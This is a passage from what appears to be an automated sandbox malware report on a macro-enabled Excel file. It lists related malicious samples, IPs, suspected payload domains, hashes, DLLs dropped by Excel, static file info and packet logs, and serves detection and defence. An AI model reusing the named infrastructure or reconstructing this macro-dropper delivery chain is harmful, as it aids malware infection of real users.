                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 143.204.4.74
                                                                                                                                                                                      f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 143.204.91.74
                                                                                                                                                                                      8f9b032ff6f56a685f4c6f9eb57784811d6c98aa83b0c.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 143.204.91.74
                                                                                                                                                                                      718421.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 143.204.91.74
                                                                                                                                                                                      Ln11IgJVUM.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.225.75.73
                                                                                                                                                                                      6c710694d270db91b550daf3177622514d2444e7484fb.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.225.75.73
                                                                                                                                                                                      SOAOG31JdG.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.225.75.73
                                                                                                                                                                                      QEiuTX6cTw.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 143.204.91.74
                                                                                                                                                                                      YiIS9HvO21.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.32.16.68
                                                                                                                                                                                      xDxD5fLpPC.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      YiIS9HvO21.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      AQvfg6cfsH.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      1hIvIzTHG5.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      0WX1X0cxwl.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      34EH2vRFeU.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      xl7FJ4h7YS.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      ciPe3thWYs.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      thousandsyears.downloadOutfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.198.51
                                                                                                                                                                                      Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.198.51
                                                                                                                                                                                      DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.198.51
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.198.51
                                                                                                                                                                                      uppercilio.funOutfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.55.83
                                                                                                                                                                                      Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.55.83
                                                                                                                                                                                      DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.55.83
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.55.83
                                                                                                                                                                                      voopeople.funOutfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.194.117
                                                                                                                                                                                      Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.194.117
                                                                                                                                                                                      DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.194.117
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.194.117

                                                                                                                                                                                      ASN

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                      CLOUDFLARENETUSrunsys32.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.20.185.68
                                                                                                                                                                                      Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.194.117
                                                                                                                                                                                      Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.194.117
                                                                                                                                                                                      DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.194.117
                                                                                                                                                                                      SMR8OzIgNB.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.8.151
                                                                                                                                                                                      Follow up Purchase order num- 4500262450.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.75.42
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.194.117
                                                                                                                                                                                      2790000.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.20.185.68
                                                                                                                                                                                      2770174.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.20.185.68
                                                                                                                                                                                      Payment Invoice.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.188.154
                                                                                                                                                                                      rial exe.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.19.200
                                                                                                                                                                                      Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.19.200
                                                                                                                                                                                      SCTc9qaix4.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 1.0.0.1
                                                                                                                                                                                      AFS Co., Ltd..exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.26.6.41
                                                                                                                                                                                      q7p7x4f4gX.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.20.184.68
                                                                                                                                                                                      XoN2GgRiga.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.23.99.190
                                                                                                                                                                                      zeMISetSYn.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.188.154
                                                                                                                                                                                      q7p7x4f4gX.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.20.184.68
                                                                                                                                                                                      Delivery Reciept.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 162.159.130.233
                                                                                                                                                                                      ESDCO0098655.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.19.200
                                                                                                                                                                                      AMAZON-02USReciept 19129475.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 54.191.98.150
                                                                                                                                                                                      Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 143.204.4.74
                                                                                                                                                                                      GDTGz3GXCiNgYwtXT6qX3tY8eu8Mqj.msiGet hashmaliciousBrowse
                                                                                                                                                                                      • 18.231.168.212
                                                                                                                                                                                      39d0c1e7.msiGet hashmaliciousBrowse
                                                                                                                                                                                      • 3.143.159.48
                                                                                                                                                                                      Movcy_v1.0.0.apkGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.39.180.2
                                                                                                                                                                                      order No. 00192099##001 pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 3.143.65.214
                                                                                                                                                                                      f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 143.204.91.74
                                                                                                                                                                                      lZYIQJNUsZ.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.249.12.162
                                                                                                                                                                                      q62NZgHtRq.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 3.22.53.161
                                                                                                                                                                                      iGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.9.197.152
                                                                                                                                                                                      8zsiEeSTzI.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.217.140.209
                                                                                                                                                                                      Request For Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 75.2.26.18
                                                                                                                                                                                      pip install.yp.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.18.63.80
                                                                                                                                                                                      Payment_Breakdown_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.58.78.16
                                                                                                                                                                                      k6sy0WOByI.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.217.101.132
                                                                                                                                                                                      seBe6bgLTw.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.248.216.40
                                                                                                                                                                                      LfFcgieca8.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.79.124.173

                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                      05af1f5ca1b87cc9cc9b25185115607dOutfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      108020075.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      G-DECL G50 EURL.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      1.docGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      DECL G50 EURL!.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Order No. 211128.docGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      SOA.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      DECL G50 EURL.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      WO 378871.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Order 824126.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      WO 378871.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      PO 31449213.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Order 161488.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Order 824126.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Order 5122948.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      PO 31449213.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      INS 2965424.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73

                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlOutfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                            PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlOutfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                  DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlOutfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                          DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                            PI-210610.xlsmGet hashmaliciousBrowse

                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fml
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):57856
                                                                                                                                                                                                              Entropy (8bit):4.963425128586394
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                                              MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                                              SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                                              SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                                              SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                              • Filename: Outfordelivery799862.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: DeliveryConf535215.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: PI-210610.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):57856
                                                                                                                                                                                                              Entropy (8bit):4.963425128586394
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                                              MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                                              SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                                              SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                                              SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                              • Filename: Outfordelivery799862.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: DeliveryConf535215.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: PI-210610.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fml
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):57856
                                                                                                                                                                                                              Entropy (8bit):4.963425128586394
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                                              MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                                              SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                                              SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                                              SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                              • Filename: Outfordelivery799862.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: DeliveryConf535215.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: PI-210610.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BDBE85F.png
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                              File Type:PNG image data, 1600 x 1600, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):174009
                                                                                                                                                                                                              Entropy (8bit):7.967231122944825
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:4DusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/XO:CRcGUlFzy4mpTHdrUc3/SsYASj
                                                                                                                                                                                                              MD5:C0AF15BAE70AFFC4BE7625110AEEF09A
                                                                                                                                                                                                              SHA1:AEF94E038F0538C812AAF9EF605F76AF2376A26D
                                                                                                                                                                                                              SHA-256:D2F5852B2EF010150C0C8A980F25B715C6363A8C4454C711B9E9F2B2532F1657
                                                                                                                                                                                                              SHA-512:131DECBB06F1CE1A049BBF25B49615320FB4DC6DF5D3DA8B44EAE455D6ACC8AE12981BC108431DCC01D21EABFE1A552581C508F57FD3FDB7D7B06B5346522B2B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Preview: .PNG........IHDR...@...@.......~.....PLTE.....3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f.........3..3.33.f3..3..3..3+.3+33+f3+.3+.3+.3U.3U33Uf3U.3U.3U.3..3.33.f3..3..3..3..3.33.f3..3..3..3..3.33.f3.3..3..3..3.33.f3..3..3..f..f.3f.ff..f..f..f+.f+3f+ff+.f+.f+.fU.fU3fUffU.fU.fU.f..f.3f.ff..f..f..f..f.3f.ff..f..f..f..f.3f.ff.f..f..f..f.3f.ff..f..f.......3..f.........+..+3.+f.+..+.+..U..U3.Uf.U..U.U......3..f.............3..f.............3..f............3..f.............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U....3.f.........3.f...........3..f.............3..f..............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f........................(....tRNS...................................................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\Desktop\~$sbf0127365-7431059.xlsm
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):165
                                                                                                                                                                                                              Entropy (8bit):1.4377382811115937
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                                                                                                                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                                                                                                                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                                                                                                                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                                                                                                                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                              C:\Users\user\XRAY.dll
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):57856
                                                                                                                                                                                                              Entropy (8bit):4.963425128586394
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                                              MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                                              SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                                              SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                                              SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\XTOWN.dll
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):57856
                                                                                                                                                                                                              Entropy (8bit):4.963425128586394
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                                              MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                                              SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                                              SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                                              SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\XZIBIT.dll
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):57856
                                                                                                                                                                                                              Entropy (8bit):4.963425128586394
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                                              MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                                              SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                                              SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                                              SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                              General

                                                                                                                                                                                                              File type:Microsoft Excel 2007+
                                                                                                                                                                                                              Entropy (8bit):7.9394014867391105
                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                              • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                                                                              • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                                                                              File name:sbf0127365-7431059.xlsm
                                                                                                                                                                                                              File size:189905
                                                                                                                                                                                                              MD5:184ff7a1642ad86b81cc2067f92cfa9d
                                                                                                                                                                                                              SHA1:6362f03ec8cdf762058724459668c9460c692b9c
                                                                                                                                                                                                              SHA256:159596a25327a7ca8531fa0d326c3d80fac14b3732a6ec33e2ba5339fdbce9df
                                                                                                                                                                                                              SHA512:b1cc059cc8991c2b9905bf8de280f7f439ade949d515a7631888cfc194e6dd9f06149cebbbb01d2daaea4e8dec1455e9b458d97f8c854fb4f1f3960af31af69d
                                                                                                                                                                                                              SSDEEP:3072:eDusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/Xvpk:8RcGUlFzy4mpTHdrUc3/SsYASx
                                                                                                                                                                                                              File Content Preview:PK..........!....7............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                              Icon Hash:e4e2aa8aa4bcbcac

                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.432560921 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.473134041 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.473273993 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.474013090 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.514425993 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.524545908 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.524564981 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.524583101 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.524597883 CEST8049167172.67.198.51192.168.2.22
